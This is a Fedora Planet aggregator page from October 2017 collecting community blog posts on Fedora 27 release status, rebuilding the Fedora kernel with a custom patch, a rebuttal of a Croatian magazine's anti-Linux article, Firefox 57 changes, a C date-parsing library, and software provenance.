Fedora People

Discrepancy Report #107743

Posted by Caolán McNamara on October 23, 2017 08:21 PM
A short 1996 article about a bug in the shuttle's starboard manipulator arm display position.

Spoiler: “A half-dozen pages of forms detail [the error] ... the most remarkable thing about the error and its paper trail. ‘There is no starboard manipulator arm’”

What I found interesting in Fedora during week 42 of 2017

Posted by Fedora Community Blog on October 23, 2017 06:29 PM

After another week, I would like to share some of the activities that have happened in Fedora since my last post:

Fedora 27 Server Beta is No-Go

On Thursday, 2017-Oct-19, we held the second round of the Go/No-Go meeting for the delayed F27 Beta release of the Server (modular) edition. The result of the meeting was No-Go, due to a missing Release Candidate compose. We are going to run a third round of the Go/No-Go meeting on Thursday, 2017-Oct-26 at 17:00 UTC, together with the Go/No-Go meeting for the F27 Final release.

Fedora 27 Final Freeze

Since Tuesday, October 17th, we have been in the freeze period for F27 Final. This means the F27 Final release is pretty close, and this Thursday, October 26th, we are going to run the Go/No-Go meeting as well as the F27 Final Readiness meeting.

Rawhide renamed to Bikeshed for the Modular Server

This is not news from the past week; however, I have realized that not many people know about it. At the beginning of October, “rawhide” was renamed to “bikeshed” for the Fedora Modular Server. So you can now find the latest modular builds on Koji under the latest-Fedora-Modular-Bikeshed directory.

New election app

Thanks to Ryan Lerch, Justin Flory and Pingou, we now have a new version of the Voting Application installed in the staging environment. Hopefully the new version will be available for the upcoming elections once F27 goes GA.

And of course, the list above is not exhaustive; there is much more going on in the Fedora community. It just summarizes some of the tasks that drew my attention.

The post What I found interesting in Fedora during week 42 of 2017 appeared first on Fedora Community Blog.

How to recompile the Fedora kernel with a custom patch

Posted by Jaroslav Škarvada on October 23, 2017 06:15 PM

I was asked how to recompile the Fedora kernel with a custom patch, so here is a short tutorial:

First, install the needed packages:


# dnf install fedpkg dnf-plugins-core

Install build requirements for the kernel package:


# dnf builddep kernel

Clone the kernel dist-git repository for the desired Fedora version; e.g., if you want to recompile the kernel for Fedora 26, add '-b f26' (or the respective branch). The --anonymous option performs an anonymous, i.e. read-only, checkout:


$ fedpkg co --anonymous -b f26 kernel

Change into the cloned dist-git directory:


$ cd kernel

Copy the desired patch (e.g. my.patch) to the working directory:


$ cp DIR/my.patch .

Make sure my.patch was generated by 'git format-patch'. If it was not, you need to manually prepend a header containing the From: and Subject: lines. Perform the following step only if such a header is not already present in your patch (edit the strings as needed):


$ echo "From: Joe Hacker <joe.hacker@hacker.org>" > header
$ echo "Subject: My patch" >> header
$ echo >> header
$ cat header my.patch > patch
$ mv patch my.patch

Edit kernel.spec, locate the line '# END OF PATCH DEFINITIONS', and add the following line just before it:


Patch9999: my.patch

Make sure the number 9999 is not already used by a previous Patch directive; if it is, increase it until you find an unused number and use that for your patch. Save the spec file.
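
If you want to check which numbers are already taken, a quick grep shows the existing Patch definitions (a minimal sketch; the spec keeps them roughly in ascending order):

$ grep -E '^Patch[0-9]+:' kernel.spec | tail -n 5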

Recompile the kernel:


$ fedpkg local

Install or reinstall the newly built kernel RPMs from the ARCH directory; i.e., if you compiled the kernel for x86_64, the ARCH directory is x86_64.
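
For example, on x86_64 something like the following should work (a sketch; the exact set of kernel subpackages varies between releases, so adjust the glob if you only want the core packages):

# dnf install ./x86_64/kernel-*.rpm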

Reverted patch

In case there is an upstream kernel patch you need to revert (let's say upstream.patch), follow the previous steps up to the installation of my.patch, then unpack the kernel sources:


$ fedpkg prep

Create a reverted version of upstream.patch (replace DIR in the commands below with the directory where you store your patches):


$ pushd kernel-*/linux-*
$ git commit -am Flush
$ cp DIR/upstream.patch .
$ patch -p1 -R < upstream.patch
$ git commit -am "Upstream reverted patch"
$ git format-patch --stdout HEAD~1 > DIR/upstream-reverted.patch
$ popd

Then add upstream-reverted.patch to the spec file instead of my.patch and proceed with the compilation as described above.

Updated Settings Application in Fedora 27 Workstation

Posted by Fedora Magazine on October 23, 2017 08:00 AM

Fedora 27 Workstation is slated for release later in the year, and it ships with version 3.26 of GNOME. One of the awesome changes from upstream GNOME shipping in Fedora 27 is the redesigned Settings application. The new Settings has moved from a grid layout to a side panel, and several of the pages — like the display configuration — are also redesigned.

Side panel navigation

Previously, the Settings application provided navigation between the pages of settings using a grid of icons. In Fedora 27, navigation between the pages is done via a new side panel. This is similar to the layout of the GNOME Tweak Tool, and allows you to quickly and easily switch between pages of settings. Having moved away from a grid layout, the Settings application window is now resizable and does not feel as cramped as in previous releases.

Display configuration

The display configuration page is completely revamped in Fedora 27 / GNOME 3.26. It now provides all the settings for configuring multiple monitors on a single page. The previous incarnation of this page required the user to drill down to change settings, and this revised layout makes it much quicker and easier to configure multiple monitors.

Network settings

The network settings page is reworked in Fedora 27. The WiFi settings now have their own page, and the network settings page is simpler and easier to use.

Taking a test drive

Fedora 27 (scheduled for release later in 2017) includes the refreshed Settings application. If you want to try it out, download a beta release of Fedora 27. Alternatively, you can upgrade your current system to the Fedora 27 Beta.

Forget PCChip's opinion of Linux

Posted by Vedran Miletić on October 22, 2017 07:17 PM

Cover image: Annie Spratt | Unsplash (photograph)

My generation of kids in Croatia interested in computer technology in the late '90s and early '00s grew up with computing magazines such as VIDI, Bug, PCChip and the (now defunct) Hacker. Since computer displays at the time were quite poor, text and images looked much better printed on paper, so magazines were a suitable medium for conveying information. In the era before broadband internet was widely available (ADSL only reached larger Croatian cities during 2003 and 2004), downloading software and multimedia from the internet was extremely slow, and the CDs that came with the magazines were a great way to obtain them.

Of course, all these magazines were also present on the internet and published news there as well. Over time, as internet speeds grew and blogs, forums, and social networks gained popularity, the popularity of both print and digital magazines declined; ask kids today and they will probably tell you they prefer video content over text.

I was more than a little surprised by PCChip's article this week, 5 fundamental differences between Windows 10 and Linux, in which a certain B.P. compared the two operating systems in terms of openness and closedness, privacy, security, updates, and support for older and/or weaker machines.

Considering the target audience, it is a solidly written and unbiased article which, after arguing each point, leaves the choice of operating system to the reader:

“But at the end of the day, you decide – Windows or Linux?”

It is worth noting that most of the magazines mentioned above wrote about Linux and open-source software very rarely, focusing instead on Windows and its software ecosystem. That is one of the reasons I personally stopped buying them: after Mozilla's initial successes, I became convinced that we could develop an office suite and an operating system in the same way. Since I wanted to be part of that story, these magazines would only have kept me focused on Windows-ecosystem topics that did not interest me.

I was even more surprised by the recent publication of a second article on the subject of Linux, titled Forget Linux. These are the reasons you should stay on Windows, from the pen... er, keyboard of a certain I.H. That article is extremely sloppily written and often hard to read, but here we will not concern ourselves with the author's narrative and orthographic abilities, only with the quality of his arguments. Let us analyze the claims made in the article, one by one.

“A large number of users still cross swords over Windows versus Linux. Some say Linux is what all users worldwide should be using, for several reasons: it is free of charge, it is an 'open source' operating system open to users' modifications and additions, and there are supposedly fewer viruses and other harmful programs for Linux than for Windows.”

This is correct.

“But is that really so, and are Linux advocates right when they cite all of this as the main reasons why, so to speak, the Linux platform is better and more 'user friendly' than Windows?”

Linux is more 'user friendly', it is just very picky about whom it considers its friends. 😉

“Since the old days, Windows has had the reputation of an operating system designed by one of 'those companies', that is, companies whose goal is to spread to as many personal computers as possible without really caring about users' needs.”

True, but so are Red Hat Enterprise Linux and SUSE Linux Enterprise, Joyent's SmartOS, and, why not, Android.

“Unlike Windows, Linux was greeted from the moment it saw the light of day as 'the light at the end of the tunnel', a platform that would be an adequate replacement for users. Given how many years have passed since Linux first saw the light of day, and that since then we have had the chance to compare several Linuxes and several versions of Windows, the final verdict does not exactly favor Linux.”

“Why is Windows nevertheless the operating system that pays off more (especially in the long run), and where exactly can Linux simply not keep up with Windows – read on.”

There are no arguments here.

“What do you, as a user, want from the operating system you use, whatever operating system that may be? The answer is probably that the operating system is compatible, and that an adequate number of programs and applications exist that are compatible with it.”

This is correct.

“Yes, it is true that a certain number of programs are equally compatible with and available for Linux as well as Windows (say, 7-Zip and Irfan View), but the fact is that for Windows there is a whole multitude of programs and applications that serve users in various ways to get better acquainted with the computer and the computer system, while for Linux that is simply not the case.”

The current version of Fedora, version 26, had 53,912 software packages in its official repository on release day (you can take my word for it or count them on one of the numerous mirrors), and for additional software there are the RPM Fusion and Copr repositories, among others. I believe other popular distributions would show similar statistics. Whatever 'getting acquainted with the computer' means (I assume the author does not mean applications for meeting people online for dating and relationships), claiming that on Linux 'there is no whole multitude of applications that serve users in various ways to get better acquainted with the computer' is simply wrong.

“What about video games? Again, true, there is a certain number of video games available for Linux (you can read more about them in one of our past articles, namely here), but to be honest, that is a drop in the ocean compared to the number and quality of games available for Windows (especially if we take into account that a large number of older games are fully compatible even with Windows 10 thanks to compatibility mode).”

In this author's Steam library, roughly 50% of the games run on Linux, and the situation is similar for other Linux users he is in contact with who are interested in gaming. Furthermore, Steam for Windows and some of its games, as well as a large number of games outside Steam, can be run via Wine. That certainly does not cover every game that exists on Windows, but saying that the number of games playable on Linux is 'a drop in the ocean compared to the number and quality of games available for Windows' does not hold, unless the drop is more than half the ocean.

How well the compatibility mode in Windows 10 is implemented I cannot say; however, the author omits one big problem directly related to compatibility: Microsoft's vendor lock-in inherent in DirectX 12 and the Windows Store. All newer games that use DirectX 12 can be distributed only as UWP applications via the Windows Store, which limits their portability to Android, Linux and macOS. DirectX 12 is not supported on any operating system other than Windows 10. The Windows Store does not exist on any operating system other than Windows and almost certainly never will. It is unrealistic to expect this problem to be solved in the future, so we can say that games using DirectX 12 are locked both to Windows 10 and to distribution via the Windows Store (you cannot, say, sell them via Steam or Uplay).

Vulkan, the open standard that is the alternative to DirectX 12, has none of these problems: besides Android and Linux, it supports Windows from XP onward (including 7, 8, 8.1 and 10). The Windows 7 support is a very significant factor given that, two years after the release of version 10, roughly equal numbers of Steam gamers use 7 and 10. Strong backing for Vulkan over DirectX 12 comes from the legendary game development studio id Software, which says that precisely this support for multiple platforms and older versions of Windows suits it, and from the Croatian studio Croteam which, incidentally, was the first studio in the world to ship an AAA game with Vulkan support, The Talos Principle.

“It is true that even on Steam there is a certain number of Linux games, some even free, but that is still far from the platform support enjoyed by all the other operating systems, not just Windows. All in all, the software field is excellently covered for the Windows platform, while the same cannot be said for Linux, regardless of the number of years Linux has been on the market.”

If we look at the game counts, without distinguishing AAA from indie titles and counting each game once, we find 8,547 games for Linux and 13,421 for macOS; macOS has about 50% more, but it is the same order of magnitude. Of course, 36,169 games for Windows is a different story altogether, but bear in mind that many indie games are made first for Windows and then never for the other operating systems.

Given that Valve only ported its first game (Team Fortress 2) and the Steam client to Linux in 2010, there is no point discussing gaming on Linux outside that seven-year window (with the honorable exception of a few earlier titles from the already mentioned id Software, ported to Linux solely thanks to John Carmack's enthusiasm). In those 7 years, Steam went from one title to 8,547; GOG.com added Linux support; AMD built a pipeline that delivered high-quality open-source drivers for its GPUs (NVIDIA and Intel remained as dependably good as before); GamingOnLinux was launched and now gets over half a million views a month (in some months closer to a million); and two subreddits about Linux gaming have tens of thousands of subscribers.

Is this comparable to the gaming scene on Windows? Not even close. Is it worth mentioning? I believe it certainly is. Does it show a growth trend? Absolutely.

“Another very important thing users very often pay attention to is the availability of upgrades to the operating system's database, that is, the availability thereof.”

So the average user cares deeply about upgrades to MySQL/MariaDB and PostgreSQL? /s

“How often is some database upgrade available for Linux? Even when it is available, it often happens that the upgrade lags 'well' behind the upgrade available for Windows. What is the reason Linux upgrades are late? The reason, or rather the cause, is logical.”

Let us have a look at Fedora's upgrades of PostgreSQL and MariaDB. After a quick review, it seems to me that they do not lag behind the upgrades available from those projects' own websites, but it is quite clear to me that the author is not actually interested in databases alone and probably does not know what he is talking about.

“Users of Windows operating systems – and only the newer ones, Windows 7, 8, 8.1 and Windows 10 – make up more than eighty percent of all computer users in the world, so it is logical that upgrades for those operating systems will be available more often than upgrades for Linux, whose users amount to about two percent. Greater demand – greater availability – which together puts one operating system 'above' another.”

Fedora 26 has had 6,389 updates in a little over 3 months since release. If Windows had a similar number of updates, Windows 10 would have had at least 50,000 updates between its release date (more than two years ago) and today. Unfortunately, I cannot find figures on the number of updates for Windows 10, but where 20,000+ updates for Windows 7 are mentioned, that figure counts the operations the updates perform, with each update performing tens, hundreds or thousands of operations. So it is hard to believe that Microsoft has released at least 50,000 updates for Windows 10 so far, despite the 'greater demand' whose supposed consequence is some abstract 'greater availability'.

“As I said, the Windows operating systems most commonly used today are Windows 10, 7 and 8, with Windows 8 the least used of the three. That is in any case fewer than the number of Linuxes in use.”

“Namely, according to some measurements, there are more than 100 'subspecies' or versions of Linux operating systems, from which users can choose the one that suits them best, depending on their needs.”

Since Linux is open-source software, it is realistic to expect that anyone with the knowledge and interest will build a distribution perfectly tailored to their own needs. Still, most users stick to one of about ten (I would dare say even fewer) major distributions or one of their derivatives.

“How do I choose the Linux that 'suits me best'?”

Very simply: use Distrochooser or a similar tool, read one of the many articles on the subject and decide, or ask the members of your local Linux user group which distributions they use and recommend.

“Do not think that choosing a Linux operating system is simple. Unlike Windows, whose core has not noticeably changed even over the last ten years, with Linux that is not so. Before deciding which Linux OS to use, a user needs to study thoroughly which one would best fit their needs. Of course, Linux advocates will say that Linux is 'better' regardless, but one should be realistic.”

If the problem is giving the average desktop user interested in gaming a default choice, this author unreservedly recommends Fedora. Fedora has not noticeably changed since 2003, except that its core values were at some point formally written down and its community of users and contributors has grown considerably.

Is that all?

“What usually happens is that Windows is the first to get the latest drivers, after which Mac OS gets them. Linux-based operating systems are very often 'lucky' to get drivers at all. The only thing that keeps Linux more or less abreast of Windows and Mac OS here is the community behind Linux, whose members often take the trouble to write drivers for some versions of Linux themselves, which is certainly commendable.”

On average this may have been true in 2002, but today it certainly is not. Unfortunately, there is still a small number of hardware manufacturers who do not provide Linux drivers for their hardware, but even then the community often solves the problem itself. As for the hypothesis that Linux gets drivers after Windows and macOS, it would be good if the author gave an example for this claim. The already mentioned NVIDIA and Intel prove that this has not been the case in the GPU domain for more than a decade, and AMD shows that other companies also understand the importance of producing quality Linux drivers at the same time as Windows ones.

“Still, what problem can arise if some programmer wants to write a driver himself? The most common problem is that the drivers he designs and creates are buggy. Of course the Windows platform, despite all its support, has problems with bugs too, no question about it. But unlike Linux, Windows has a whole team of experts who start working on a fix as soon as a bug appears, while with the many and varied versions of Linux it is different.”

It is true, say, that in 2007 the drivers for some sound cards were buggy, but that is not the case today. It is also true, for example, that Qualcomm, one of the manufacturers of wireless network cards, employs people who regularly contribute driver improvements for the hardware it makes and sells directly into the Linux kernel. Again, if the author is not just talking off the top of his head, it would be good if he gave an example for his claim.

“Do you think Linux is simple, or simpler than it was ten years ago, or do you think it is simpler to use than Windows? Whichever of the three you believe, opinions of course differ from user to user (users accustomed to Linux will naturally say it is simpler than Windows), but again one should try to be realistic and say how things stand.”

“If you were a lay user, with no particular experience using any operating system, and you had the chance to use both Linux and Windows, which would be simpler for you? The answer is – Windows.”

“Windows is simply far more 'user-friendly' than Linux, especially for beginners, and that is simply how it is.”

Unfortunately, there are no arguments here.

If you have not yet encountered Linux desktops, have a look at GNOME 3 and KDE Plasma and judge for yourself how much more or less 'user friendly' they are than some version of Windows.

“The last and most important question for the end – Linux or Windows? Which is better? It depends. It depends on whether you are a user whose main goal is programming and working with 'open source' programs (which is what Linux is), or a user who wants an operating system that offers compatibility, a simple interface, ease of use, wide availability of programs and games, and on which you can, say, click on BS Player and play a film without any problems.”

On Fedora you will not have BS Player, but using the Software application you will easily find an application that plays video content. The Software application is a rough equivalent of Google Play or the App Store; when you have a store of free and open-source software at your fingertips, you do not have to trawl the internet and install software from randomly found websites, taking on all the risks that entails.

“It all comes down to taste, and there is no arguing about taste. But if you belong to the majority of ordinary or 'casual' users – choose Windows.”

Of course, everyone should choose for themselves. But if you are among the users who have had enough of the already mentioned Microsoft vendor lock-in to Windows 10, DirectX 12 and the Windows Store, with which Microsoft would secure the market for itself forever at a time when it is no longer competitive; of Microsoft's violation of your privacy through so-called 'telemetry'; and of Microsoft deciding in your stead what gets installed on your computer – choose Fedora.

tl;dr: this is an extremely poor article, given that most of the claims its author makes may have been true in 2002, but were largely untrue by 2007 and are certainly untrue today.

Replacing the thermal paste in my laptop

Posted by Charles-Antoine Couret on October 22, 2017 04:58 PM

There are some computer maintenance tasks we forget to do even though they are essential.

Replacing the thermal paste is one of them. Thermal paste is what improves thermal conductivity between the processor (or GPU) and the heatsink that dissipates the heat. It smooths out the imperfections of the two surfaces, increasing the contact area and avoiding trapped air, which is a good insulator.

But thermal paste is only effective for a few years; after that it begins to crack and flake off, and so no longer performs its function properly. It then has to be replaced.

My computer is an HP EliteBook 8560w that has just turned 6 years old. For the past few weeks or months, its temperature had constantly been between 80 and 100°C, even when I was not doing anything in particular. That is far too hot. As a result, the processor kept dropping into power-saving mode to avoid overheating, which degraded performance.

I decided to fix the problem, as I am not planning to replace the machine for another few months.

Hardware

Total cost: less than €30.

My machine has a lot of Torx screws, and to avoid damaging it I preferred to have a very thin tool for separating parts and something to scrape off the old thermal paste. Hence the purchase of the two tool sets, which in theory can be used to disassemble quite a few machines.

A small pair of tweezers is quite handy for manipulating the small connectors.

Procedure

Before starting, to avoid mistakes, I preferred to watch a disassembly video first.

As with many laptops, getting at the graphics card and the processor is not easy. Practically everything has to be removed from the bottom half of the machine: keyboard, touchpad, hard drive, CD drive... In the end only part of the chassis and the motherboard remain.

You then remove the entire cooling module, which is shared by the processor and the graphics card. Each has its own heatsink, which passes the heat to a fan and a shared external radiator. This makes the operation a bit more tedious.

You can see the disassembled module:

IMG-20171020-WA0001.jpg

And the motherboard, with the CPU on the left and the graphics card on the right:

IMG-20171020-WA0000.jpg

Of course, everything then has to be reassembled without mixing up the screws. Try to seat the components properly (which I failed to do the first time, notably the connector for the mouse buttons, which was not plugged in correctly). Power up the beast and check that everything works. And phew, everything does.

Results

My computer now idles between 60 and 80°C. 100°C is only reached under intensive load. It is much more pleasant: in use I get fewer slowdowns, and I can use it on my lap without getting burned.

For a little under €30 and nearly 3 hours of work, the result is well worth it. Don't hesitate to do it if your machine runs too hot (and if a bit of tinkering doesn't scare you). ;-)

Friday, October 20, was the final day of LatinoWare, and the temperature settled at 28ºC with some clouds. Participants...

Posted by Wolnei Tomazelli Junior on October 21, 2017 09:17 PM
Friday, October 20, was the final day of LatinoWare, and the temperature settled at 28ºC with some clouds. Participants started arriving at the event again around 10:20 am.
From 10 am until 11 am, in room Venezuela, I gave my talk about Fedora QA to 15 people, and to my surprise it inspired Dennis Gilmore to start running Kernel Tests on his ARM board.
Once again, the last day of any event in Brazil brings the free distribution of stickers, limited to one of each type per person while stock lasted. In the end, the Fedora Project distributed 700 stickers and 25 badge lanyards to old and new contributors, installed Fedora on 2 notebooks, and gained three new people to review packaging, translation, and websites.
The main activity took place at 2 pm, with the official photo of the event with all participants, and at 6 pm came the event's closing goodbye ceremony. #fedora #latinoware #linux #FozIguacu

21/10/2017


Exploring Google Code-In, ListenBrainz easyfix bugs, D3.js

Posted by Justin W. Flory on October 21, 2017 09:01 AM
On the data refrain: Contributing to ListenBrainz

This post is part of a series of posts where I contribute to the ListenBrainz project for my independent study at the Rochester Institute of Technology in the fall 2017 semester. For more posts, find them in this tag.


Last week moved quickly for me in ListenBrainz. I submitted multiple pull requests and participated in the weekly developer’s meeting on Monday. I was also invited to take part as a mentor for ListenBrainz for the upcoming round of Google Code-In! In addition to my changes and new role as a mentor, I’m researching libraries like D3.js to help build visualizations for music data.  Suddenly, everything started moving fast!

Last week: Recap

The ListenBrainz team accepted my development environment improvements and documentation. This gave me an opportunity to better explore project documentation tools. I experimented with Sphinx and Read the Docs. Sphinx introduced me to reStructuredText for documentation formats. I’ve avoided it in favor of Markdown for a long time, but I see where reStructuredText is stronger for advanced documentation.

Since ListenBrainz is a new project, I plan to contribute documentation for any of my work and improve documentation for pre-existing work. One of the goals for this independent study is to make ListenBrainz a viable candidate for a future data analysis course. To make it easy to use and understand, ListenBrainz needs excellent documentation. Since one of my strengths is technical writing, I plan to contribute more documentation this semester.

You can see some of the new documentation already!

Google Code-In mentor

The MetaBrainz community manager, Freso Olesen, approached me to mentor for Google Code-In. Google Code-In is an opportunity for teenagers to meaningfully contribute to open source projects. Google describes Google Code-In as…

Pre-university students ages 13 to 17 are invited to take part in Google Code-in: Our global, online contest introducing teenagers to the world of open source development. With a wide variety of bite-sized tasks, it’s easy for beginners to jump in and get started no matter what skills they have.

Mentors from our participating organizations lend a helping hand as participants learn what it’s like to work on an open source project. Participants get to work on real software and win prizes from t-shirts to a trip to Google HQ!

MetaBrainz is a participating organization of Google Code-In this cycle. Because of my work with ListenBrainz, I will contribute a few hours a week to help mentor participating students with ListenBrainz. Beginner problems should be easy to help with since I’m still beginning too, and as I spend more time with ListenBrainz, I can help with harder problems.

I’m excited to give back to one of my favorite open source projects in this way! I’m grateful to have this chance to help out during Google Code-In.

Choosing easyfix bugs

After I figured out the development environment issues, I went through the open tickets filed against ListenBrainz to find some to work on. I made a preliminary pass through all open tickets and left comments asking for more information where needed. The tickets I highlighted to look into next were:

  • LB-85: Username in the profile URL should be case insensitive
  • LB-124: Install messybrainz as a Python library from requirements
  • LB-176: Add stats module and begin calculating some user stats from BigQuery
  • LB-206: “playing_now” submissions not showing on profile
  • LB-212: Show the MetaBrainz logo on the listenbrainz footer.

Of these five, LB-124 and LB-212 are already closed. While drafting this article, I completed LB-124 in PR #266. This was part of a test to get the documentation building again because of odd import errors. Later, a new student also learning the project for the first time asked to work on LB-212. Since it was a good first task to explore the project code, I passed the ticket to him.

I want to do one more “easyfix” bug before going into the main part of my independent study timeline. I don’t yet feel comfortable with the code and one more bug solved will help. After this, I plan to pursue the heavier lifting of the independent study to explore data operations and queries to make.

Researching D3.js

Prof. Roberts introduced D3.js as a library to build interactive, dynamic charts and visual representations of data. I haven’t yet looked into much front-end work, but this was a cool project that I wanted to highlight in my weekly report. This feels like it could be a powerful match for ListenBrainz, especially since the data has high detail.

Upcoming activity

This next week, I won’t have as much time to contribute to ListenBrainz. On October 21, I’m traveling to Raleigh, NC for All Things Open. On October 24, I present my talk, “What open source and J.K. Rowling have in common”. Since I’ll be out of Rochester and missing other classwork, I expect less time on my ListenBrainz work.

This next week will be slower than the last two weeks. Hopefully I’ll learn something at the conference too to bring back for ListenBrainz.

Until then… keep the FOSS flag high.

The post Exploring Google Code-In, ListenBrainz easyfix bugs, D3.js appeared first on Justin W. Flory's Blog.

[Fedora 27] Enabling client-side decoration in Firefox 57

Posted by Fedora-Blog.de on October 21, 2017 07:30 AM

Briefly noted:

Fedora 27 contains packages for Firefox 57, which supports GTK3 client-side decoration (CSD).

To enable CSD, simply set the value of widget.allow-client-side-decoration to true in about:config and then restart Firefox.
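
If you prefer scripting the change, the same preference can be appended to the profile's user.js (a sketch; replace PROFILE with your actual profile directory, and make sure Firefox is not running):

$ echo 'user_pref("widget.allow-client-side-decoration", true);' >> ~/.mozilla/firefox/PROFILE/user.js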

Introducing libiso8601

Posted by Nathaniel McCallum on October 20, 2017 10:45 PM

Four years ago I needed a library for parsing ISO 8601 dates in C. After I wrote most of it, we ended up going in a different direction. This code has sat on my computer since then. But no more!

This week I polished it up and pushed it to GitHub. The library is fully tested (with >98% code coverage) and handles not only all the ISO 8601 standard formats but many common non-standard variations as well.

Here’s an example of how to use it:

#include <iso8601.h>
#include <assert.h>
#include <string.h>

int main() {
    iso8601_time time = {};
    char str[128] = {};

    /* Parse an ISO 8601 timestamp into its component fields. */
    iso8601_parse("2010-02-14T13:14:23.123456Z", &time);

    assert(time.year == 2010);
    assert(time.month == 2);
    assert(time.day == 14);
    assert(time.hour == 13);
    assert(time.minute == 14);
    assert(time.second == 23);
    assert(time.usecond == 123456);

    /* Re-format the parsed time as an ISO 8601 week date, truncated to the day. */
    iso8601_unparse(&time, ISO8601_FLAG_NONE, 4, ISO8601_FORMAT_WEEKDATE,
                    ISO8601_TRUNCATE_DAY, sizeof(str), str);

    assert(strcmp(str, "2010-W06-7") == 0);
    return 0;
}
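
Compiling and running the example might look like this (a sketch; the -liso8601 link name and installed header location are assumptions, so check the project's README for the actual build instructions):

$ gcc -o example example.c -liso8601
$ ./example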

I’d love to get some review of the API before I release the first version. So if you’re into telling people how bad their code is, please wander this way!

Firefox 57 for Fedora 26 and 27

Posted by Fedora-Blog.de on October 20, 2017 08:00 PM

As Fedora Magazine writes in an article on Firefox 57, Fedora 27 will receive the update to Firefox 57 shortly after its release. Users of Fedora 26, however, will have to wait somewhat longer, because due to the massive changes in this version the update will stay in the updates-testing repository longer than usual, giving users the chance to check whether their extensions still work with Firefox 57. Fedora 25 will not receive an update to Firefox 57 at all.

The reason for the different update practice between Fedora 26 and 27 is that Fedora 27 has already carried the beta versions of Firefox 57 in its repositories for some time, so Fedora 27 users effectively have a head start in testing their extensions.

Where Did That Software Come From?

Posted by Russel Doty on October 20, 2017 05:29 PM

I have an article in the Oct. 9 issue of Military Embedded Systems magazine on software provenance titled Where Did That Software Come From?

Where did the software on your embedded system come from? Can you prove it? Can you safely update systems in the field? Cryptography provides the tools for verifying the integrity and provenance of software and data. There is a process by which users can verify the source of software, whether it was tampered with in transit, and whether it was modified after installation.

The article explores how cryptography, especially hashing and code signing, can be used to establish the source and integrity of software. It examines how source code control systems and automated build systems are a key part of the software provenance story. (Provenance means “a record of ownership of a work of art or an antique, used as a guide to authenticity or quality.” It is increasingly being applied to software.)
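
As a minimal sketch of those two building blocks, here is how a user might verify a download's integrity and origin with standard tools (the file names are placeholders):

$ sha256sum -c CHECKSUMS                 # integrity: recompute hashes and compare to the published list
$ gpg --verify CHECKSUMS.sig CHECKSUMS   # provenance: check the publisher's detached signature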

As an interesting side note, the article describes how the git version control system is very similar to a blockchain.
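
The resemblance is visible directly in git's object model: every commit embeds the hash of its parent, so the history forms a tamper-evident hash chain (illustrative output; the hashes and identities below are made up):

$ git cat-file -p HEAD
tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904
parent 9fceb02d0ae598e95dc970b74767f19372d61af8
author Jane Doe <jane@example.com> 1508515200 +0000
committer Jane Doe <jane@example.com> 1508515200 +0000

Example commit message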


Fedora meets RHEL

Posted by Debarshi Ray on October 20, 2017 02:36 PM

As we enter the final freeze before the Fedora 27 Workstation release, I’d like to highlight a new feature that will hopefully make Fedora more attractive for developers. Last month, I had written about our experiments to make it easier to consume gratis, self-supported Red Hat Enterprise Linux installations from Fedora Workstation. I am happy to report that this is now a reality.

gnome-boxes-new-source-selection-rhel

Starting from Fedora 27 Workstation, you’ll be able to install an infinite number of RHEL 7.x VMs right from inside GNOME Boxes. All you need is an account on developers.redhat.com, and it will automatically set up a RHEL virtual machine that’s entitled to the RHEL Developer Suite subscription.

gnome-boxes-new-source-selection-rhel-01

Thanks to Felipe Borges for a seemingly endless round of patch reviews, and to Fabiano and Victor for occasionally lending us their brains.


Firefox 57 coming soon: a Quantum leap

Posted by Fedora Magazine on October 20, 2017 08:00 AM

A few packages in Fedora get major updates outside the regular release cycle. The kernel is one of these, and Firefox is another. The maintainers do their best to handle these situations, and of course they always try to avoid breaking changes to the user experience. However, there are times when upstream provides a path that makes this unavoidable. One of those rare situations is happening at present.

Upstream work on Firefox 57

Over the past year, Mozilla has been working on a series of major changes to the Firefox browser, mainly for performance and security. These changes are referred to as Project Quantum. Some improvements have already arrived, with no major visible differences for users.

Last month the major changes landed in the developer channel. They mark a major milestone for how extensions work, and gave third-party developers a chance to review their extensions and make changes to remain compatible. Firefox 57 marks an end to the legacy XUL-based extensions. Starting with version 57, Firefox supports only a new type of extension, called a WebExtension.

This shouldn’t be a surprise to Firefox extension developers, though. The compatibility roadmap has been known for the past year. Those who maintain their own extensions should read through the general upstream documentation on the change and the specific porting guide, as well.

User visible changes

Of course, developers following the Mozilla blogs have been aware of this change for a while. But the question remains: what does this mean for users?

The WebExtensions API is a cross-platform initiative. Therefore, this change means more extensions shared between Chrome, Opera, Firefox, and the larger community, which should lead to better quality extensions overall. For the past several months, extension developers have been porting their extensions and giving Mozilla feedback on the APIs they require. Over 5000 extensions from addons.mozilla.org have already been converted to remain compatible with version 57 and onward.

Users probably shouldn’t “hold back at FF56 as my favorite extensions don’t work.” Recall that security fixes only come in new versions, and those will all be WebExtension-only. The Extended Support Release version will also switch to WebExtensions-only at its next release. That date, June 2018, marks the deadline for ESR users to migrate their extensions.

Check which extensions you use that aren’t supported, and investigate whether the developer has a replacement or a beta test build. An upstream effort tracks whether popular extensions have been ported, along with related Mozilla bugs.

In addition to the extension changes, there are UI changes (codename Photon) as well as HTML, CSS and JavaScript rendering additions and fixes. Although the present beta release notes are brief, they link to further articles on the changes. Users and system administrators should read them to be prepared.

How Fedora is handling Firefox 57

The Firefox 57 release is scheduled for November 14; Fedora 27 releases a week or so before that. The current Fedora 27 Beta carries the Firefox 57 beta, and Fedora intends to deliver the Firefox 57 final release in a Fedora 27 update. This will be a significant part of the Fedora 27 Workstation release. If you use extensions, you’ll want to be aware of this plan.

Once Mozilla releases version 57, it will be submitted to the Fedora 26 updates-testing repository for an extended period. This provides adequate time for users to check their extensions before the update is promoted. After that, the update will come to the stable repos for Fedora 26.

Between now and then, a COPR provides builds for early testing, updated with any changes from the Fedora 27 release. Note that you cannot return to the older release on the same profile, due to changes in the update; bear that in mind before installing this early release. You may want to back up your existing profile before you update. This COPR will be removed when Firefox 57 reaches the Fedora 26 updates-testing repository.

To test these early package builds and provide early feedback on any issues, follow the usual COPR instructions to enable the repository and install the software:

dnf copr enable jhogarth/firefox57
dnf update firefox

When version 57 reaches the testing repository of Fedora 26 and the COPR is no longer required, remove it. This gets you the official Firefox maintainer’s builds and a clean future upgrade to Fedora 27:

dnf clean all
dnf copr remove jhogarth/firefox57

Providing feedback on the upcoming packages

Is the thought of testing the upcoming Firefox tempting? Then please follow these guidelines so maintainers can more easily handle your reported issues.

  • The Fedora 25 builds are entirely unsupported and provided only as a convenience for testing. Only Fedora 26 will receive the Firefox 57 update in the official Fedora repositories.
